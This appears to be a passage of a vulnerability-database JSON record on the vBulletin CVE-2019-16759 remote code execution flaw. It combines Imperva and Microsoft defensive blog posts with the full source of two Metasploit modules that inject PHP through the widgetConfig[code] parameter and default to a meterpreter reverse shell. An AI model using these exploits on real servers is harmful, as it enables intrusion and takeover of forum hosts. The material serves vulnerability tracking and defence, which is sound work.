'vars_post' =>\r\n {\r\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\r\n\t 'widgetConfig[code]' => payload.encoded,\r\n }\r\n })\r\n #unless resp and resp.code == 200\r\n # fail_with(Failure::Unknown, \"Exploit failed.\")\r\n #end\r\n\r\n #print_good(\"Success!\")\r\n #print_line(resp.body)\r\n\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47437"}], "impervablog": [{"lastseen": "2019-09-26T15:44:30", "bulletinFamily": "blog", "cvelist": ["CVE-2019-16759"], "description": "Imperva\u2019s Cloud WAF has identified instances of a new 0-day vulnerability being exploited within a matter of hours of the exploit being published.\n\nOn Monday 23rd September 2019, an exploit was published for a vulnerability found within vBulletin (versions 5.0.0 to 5.5.4), allowing malicious attackers to perform authentication-free Remote Code Execution on the origin server. Alongside the exploit, \u201cgoogle dorks\u201d - which allow attackers to find potentially vulnerable instances of the service in the wild - were also published.\n\nThe vulnerability exists where URL parameters are passed to a widget file within the forum software itself. These parameters are then parsed on the server without any security checks - the malicious attacker can then inject commands and is able to remotely execute code on the application server.\n\nThe exploit for this vulnerability enables an attacker to generate a post request to the vulnerable instance of vBulletin, containing the parameter \u2018widgetConfig\u2019 which is parsed on the server and evaluated without being sanitized. For example: \n \nThe attack pattern triggered mitigation rules on our Cloud WAF, based on known existing attack patterns as well as on data we\u2019ve collected on malicious source IPs. This allowed Imperva to observe and block the attack as it occurred, within 24 hours of the vulnerability\u2019s publication. The rules in question matched against known malicious Remote Code Execution patterns present in the body of the request.\n\nA Python-based exploit, which can easily be used by low skilled attackers is now publicly available for anyone to exploit this 0-day vulnerability, which has been assigned[ CVE-2019-16759.](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>)\n\nBelow are some examples of the payloads observed since the exploit's release, along with a brief explanation of the perceived attacker intent.\n\n## Example 1:\n\n**Number of similar observed requests: **7,000+ \n**Explanation: **The attacker is using the shell_exec function to execute shell commands on the server.\n\n## Example 2:\n\n**Number of similar observed requests: **3,000+ \n**Explanation: **The attacker is likely testing the exploit by executing the md5 function on a given string. If the server returns the md5 hash the exploit has worked.\n\n## Example 3:\n\n**Number of similar observed requests: **70+ \n**Explanation: **The eval function is used to run base64 decoded, obfuscated php.\n\n## Example 4:\n\n**Number of similar observed requests: **50+ \n**Explanation: **Attempts to read a remote file, demonstrating that the server can execute an attacker code.\n\n## Example 5:\n\n**Number of similar observed requests: **1 \n**Explanation:** The attacker is using the shell_exec to use wget to retrieve a php file from a remote location, and write it to the server. In this instance the php code is a backdoor, enabling uploads of additional files.\n\n## vBulletin RCE Vulnerability: Timeline of Events\n\nAt the time of writing, Imperva has observed over 10,000 instances of rules triggered by the payload generated by the published exploit.\n\n 1. **23/09/19 - 23:05:** vBulletin 5.x 0day pre-auth RCE exploit published on seclists.org.\n 2. **24/09/19 - 08:15:** First malicious requests similar to the payload from the published exploit triggers blocking rules on Imperva Cloud WAF. \n__These initial payloads were not generated directly from the published exploit, however, as \u2018echo shell_exec('\"+cmd+\"');\u2019 is passed in the parameter in the published exploit so shell commands can be executed.\n 3. **25/09/19 - 03:02:** First malicious payloads matching exactly those generated by the published exploit trigger blocking rules on Imperva Cloud WAF._ \n \n_\n 4. **25/09/19 - 05:15:** Mass-Pwn-vBulletin scanner published on Github\n 5. **25/09/19 - 10:17:** vBulletin security patch released on forums.\n 6. **25/09/19 - 13:38:** First malicious requests matching those generated by the Mass-Pwn-vBulletin scanner observed and blocked.\n 7. **25/09/19 - 14:58: Specific rule matching the published exploit added globally to Imperva Cloud WAF.**\n 8. **26/09/19 - 04:50:** Nmap script for CVE-2019-16759 released on Github.\n\nAnother valuable insight provided by the functionality in the Imperva Cloud WAF was the ability to track the volume of malicious requests from IPs of known threat actors, which is constantly updated. The Imperva Cloud WAF has unique ways of gathering this data and, in this case, we were able to observe that a number of the requests originated from IPs which had already been listed as malicious in previous activities such as remote file inclusion. \n\nThe Security Research Team at Imperva are continuing to monitor this attack as it develops.\n\nThe post [Attackers Are Quick to Exploit vBulletin\u2019s Latest 0-day Remote Code Execution Vulnerability](<https://www.imperva.com/blog/attackers-are-quick-to-exploit-vbulletins-latest-0-day-remote-code-execution-vulnerability/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2019-09-26T13:43:30", "published": "2019-09-26T13:43:30", "id": "IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8", "href": "https://www.imperva.com/blog/attackers-are-quick-to-exploit-vbulletins-latest-0-day-remote-code-execution-vulnerability/", "type": "impervablog", "title": "Attackers Are Quick to Exploit vBulletin\u2019s Latest 0-day Remote Code Execution Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-09-29T16:53:37", "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring POST request.\n", "published": "2019-10-18T11:51:58", "type": "metasploit", "title": "vBulletin widgetConfig RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_WIDGETCONFIG_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin widgetConfig RCE',\n 'Description' => %q{\n vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]\n parameter in an ajax/render/widget_php routestring POST request.\n },\n 'Author' => [\n 'unknown', # discovered by an unknown sender.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # this module.\n ],\n 'References' => [\n ['CVE', '2019-16759'],\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\n ['URL', 'https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html']\n ],\n 'DisclosureDate' => '2019-09-23',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'windows'],\n 'Arch' => [ARCH_CMD, ARCH_PHP],\n 'Privileged' => true,\n 'Targets' => [\n ['Meterpreter (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => [ARCH_PHP],\n 'Type' => :php_memory,\n 'Payload' => {\n 'BadChars' => \"\\x22\",\n },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => false\n }\n ],\n ['Unix (CMD In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => true\n }\n ],\n ['Windows (CMD In-Memory)',\n 'Platform' => 'windows',\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'DisablePayloadHandler' => true\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n end\n\n def cmd_payload(command)\n return(\"echo #{datastore['PHP_CMD']}('#{command}'); exit;\")\n end\n\n def execute_command(command)\n response = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'encode_params' => true,\n 'vars_post' => {\n 'routestring' => 'ajax/render/widget_php',\n 'widgetConfig[code]' => command\n }\n })\n if (response) && (response.body)\n return response\n end\n\n return false\n end\n\n def check\n rand_str = Rex::Text.rand_text_alpha(8)\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\n if received && received.body.include?(rand_str)\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n unless check.eql? Exploit::CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n end\n vprint_good(\"The target appears to be vulnerable.\")\n\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n case target['Type']\n when :unix_cmd, :windows_cmd\n cmd = cmd_payload(payload.encoded)\n vprint_status(\"Generated command payload: #{cmd}\")\n\n received = execute_command(cmd)\n if (received) && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\n print_warning('Dumping command output in body response')\n if received.body.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(\"#{received.body}\")\n end\n\n when :php_memory\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vbulletin_widgetconfig_rce.rb"}, {"lastseen": "2020-09-30T07:44:27", "description": "This module exploits a logic bug within the template rendering code in vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. This causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n", "published": "2020-08-09T22:38:52", "type": "metasploit", "title": "vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2020-08-14T13:25:57", "id": "MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_WIDGET_TEMPLATE_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',\n 'Description' => %q{\n This module exploits a logic bug within the template rendering code in vBulletin 5.x.\n The module uses the vBulletin template rendering functionality to render the\n 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.\n This causes the former template to load the latter bypassing filters originally put in place\n to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input\n allowing the module to achieve PHP remote code execution on the target. This module has been\n tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n },\n 'Author' => [\n 'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module\n ],\n 'References' => [\n ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],\n ['CVE', '2020-17496']\n ],\n 'DisclosureDate' => '2020-08-09',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'windows'],\n 'Arch' => [ARCH_CMD, ARCH_PHP],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Meterpreter (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => [ARCH_PHP],\n 'Type' => :php_memory,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => false\n }\n ],\n [\n 'Unix (CMD In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => true\n }\n ],\n [\n 'Windows (CMD In-Memory)',\n 'Platform' => 'windows',\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'DisablePayloadHandler' => true\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\n ])\n\n end\n\n def cmd_payload(command)\n \"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\"\n end\n\n def execute_command(command)\n response = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'),\n 'encode_params' => true,\n 'vars_post' => {\n 'subWidgets[0][template]' => 'widget_php',\n 'subWidgets[0][config][code]' => command\n }\n })\n if response && response.body\n return response\n end\n\n false\n end\n\n def check\n rand_str = Rex::Text.rand_text_alpha(8)\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\n if received && received.body.include?(rand_str)\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n case target['Type']\n when :unix_cmd, :windows_cmd\n cmd = cmd_payload(payload.encoded)\n vprint_status(\"Generated command payload: #{cmd}\")\n\n received = execute_command(cmd)\n if received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\n print_warning('Dumping command output in body response')\n if received.body.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(received.body.to_s)\n end\n\n when :php_memory\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vbulletin_widget_template_rce.rb"}], "mssecure": [{"lastseen": "2020-02-06T16:48:38", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0604", "CVE-2019-16759"], "description": "Recently, an organization in the public sector discovered that one of their internet-facing servers was misconfigured and allowed attackers to upload a web shell, which let the adversaries gain a foothold for further compromise. The organization enlisted the services of Microsoft\u2019s Detection and Response Team (DART) to conduct a full incident response and remediate the threat before it could cause further damage.\n\nDART\u2019s investigation showed that the attackers uploaded a web shell in multiple folders on the web server, leading to the subsequent compromise of service accounts and domain admin accounts. This allowed the attackers to perform reconnaissance using _net.exe,_ scan for additional target systems using _nbtstat.exe_, and eventually move laterally using PsExec.\n\nThe attackers installed additional web shells on other systems, as well as a DLL backdoor on an Outlook Web Access (OWA) server. To persist on the server, the backdoor implant registered itself as a service or as an [Exchange transport agent](<https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help>), which allowed it to access and intercept all incoming and outgoing emails, exposing sensitive information. The backdoor also performed additional discovery activities as well as downloaded other malware payloads. In addition, the attackers sent special emails that the DLL backdoor interpreted as commands.\n\n\n\n_Figure 1. Sample web shell attack chain_\n\nThe case is one of increasingly more common incidents of web shell attacks affecting multiple organizations in various sectors. A web shell is a piece of malicious code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow adversaries to execute commands and to steal data from a web server or use the server as launch pad for further attacks against the affected organization.\n\nWith the use of web shells in cyberattacks on the rise, Microsoft\u2019s DART, the Microsoft Defender ATP Research Team, and the Microsoft Threat Intelligence Center (MSTIC) have been working together to investigate and closely monitor this threat.\n\n## Web shell attacks in the current threat landscape\n\nMultiple threat actors, including [ZINC](<https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/>), [KRYPTON](<https://www.microsoft.com/security/blog/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/>), and [GALLIUM](<https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/>), have been observed utilizing web shells in their campaigns. To implant web shells, adversaries take advantage of security gaps in internet-facing web servers, typically vulnerabilities in web applications, for example [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>) or [CVE-2019-16759](<https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/>).\n\nIn our investigations into these types of attacks, we have seen web shells within files that attempt to hide or blend in by using names commonly used for legitimate files in web servers, for example:\n\n * _index.aspx_\n * _fonts.aspx_\n * _css.aspx_\n * _global.aspx_\n * _default.php_\n * _function.php_\n * _Fileuploader.php_\n * _help.js_\n * _write.jsp_\n * _31.jsp_\n\nAmong web shells used by threat actors, the China Chopper web shell is one of the most widely used. One example is written in JSP:\n\n\n\nWe have seen this malicious JSP code within a specially crafted file uploaded to web servers:\n\n\n\n_Figure 2. Specially crafted image file with malicious JSP code_\n\nAnother China Chopper variant is written in PHP:\n\n\n\nMeanwhile, the KRYPTON group uses a bespoke web shell written in C# within an ASP.NET page:\n\n\n\n_Figure 3. Web shell written in C# within an ASP.NET page_\n\nOnce a web shell is successfully inserted into a web server, it can allow remote attackers to perform various tasks on the web server. Web shells can steal data, perpetrate watering hole attacks, and run other malicious commands for further compromise.\n\nWeb shell attacks have affected a wide range of industries. The organization in the public sector mentioned above represents one of the most common targeted sectors.\n\nAside from exploiting vulnerabilities in web applications or web servers, attackers take advantage of other weaknesses in internet-facing servers. These include the lack of the latest security updates, antivirus tools, network protection, proper security configuration, and informed security monitoring. Interestingly, we observed that attacks usually occur on weekends or during off-hours, when attacks are likely not immediately spotted and responded to.\n\nUnfortunately, these gaps appear to be widespread, given that every month, [Microsoft Defender Advanced Threat Protection (ATP)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) detects an average of 77,000 web shell and related artifacts on an average of 46,000 distinct machines.\n\n\n\n_Figure 3: Web shell encounters__ _\n\n## Detecting and mitigating web shell attacks\n\nBecause web shells are a multi-faceted threat, enterprises should build comprehensive defenses for multiple attack surfaces. [Microsoft Threat Protection](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides unified protection for identities, endpoints, email and data, apps, and infrastructure. Through signal-sharing across Microsoft services, customers can leverage Microsoft\u2019s industry-leading optics and security technologies to combat web shells and other threats.\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. The installation of web shells can be detected by monitoring web application directories for web script file writes. Applications such as Outlook Web Access (OWA) rarely change after they have been installed and script writes to these application directories should be treated as suspicious.\n\nAfter installation, web shell activity can be detected by analyzing processes created by the Internet Information Services (IIS) process _w3wp.exe_. Sequences of processes that are associated with reconnaissance activity such as those identified in the alert screenshot (_net.exe_, _ping.exe_, _systeminfo.exe,_ and _hostname.exe_) should be treated with suspicion. Web applications such as OWA run from well-defined Application Pools. Any _cmd.exe_ process execution by _w3wp.exe_ running from an application pool that doesn\u2019t typically execute processes such as 'MSExchangeOWAAppPool' should be treated as unusual and regarded as potentially malicious.\n\n[Microsoft Defender ATP](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) exposes these behaviors that indicate web shell installation and post-compromise activity by analyzing script file writes and process executions. When alerted of these activities, security operations teams can then use the rich capabilities in Microsoft Defender ATP to investigate and resolve web shell attacks.\n\n\n\n\n\n_Figure 4. Sample Microsoft Defender ATP alerts related to web shell attacks_\n\n\n\n_Figure 5. Microsoft Defender ATP alert process tree_\n\nAs in most security issues, prevention is critical. Organizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Deploy latest security updates as soon as they become available.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * [Enable cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats.\n * Educate end users about preventing malware infections. Encourage end users to practice good credential hygiene\u2014limit the use of accounts with local or domain admin privileges.\n\n \n\n \n\n**_Detection and Response Team (DART)_**\n\n**_Microsoft Defender ATP Research Team_**\n\n**_Microsoft Threat Intelligence Center (MSTIC)_**\n\n \n\nThe post [Ghost in the shell: Investigating web shell attacks](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>) appeared first on [Microsoft Security.", "modified": "2020-02-04T17:30:40", "published": "2020-02-04T17:30:40", "id": "MSSECURE:8D599A5B631D1251230D906E6D71C774", "href": "https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/", "type": "mssecure", "title": "Ghost in the shell: Investigating web shell attacks", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}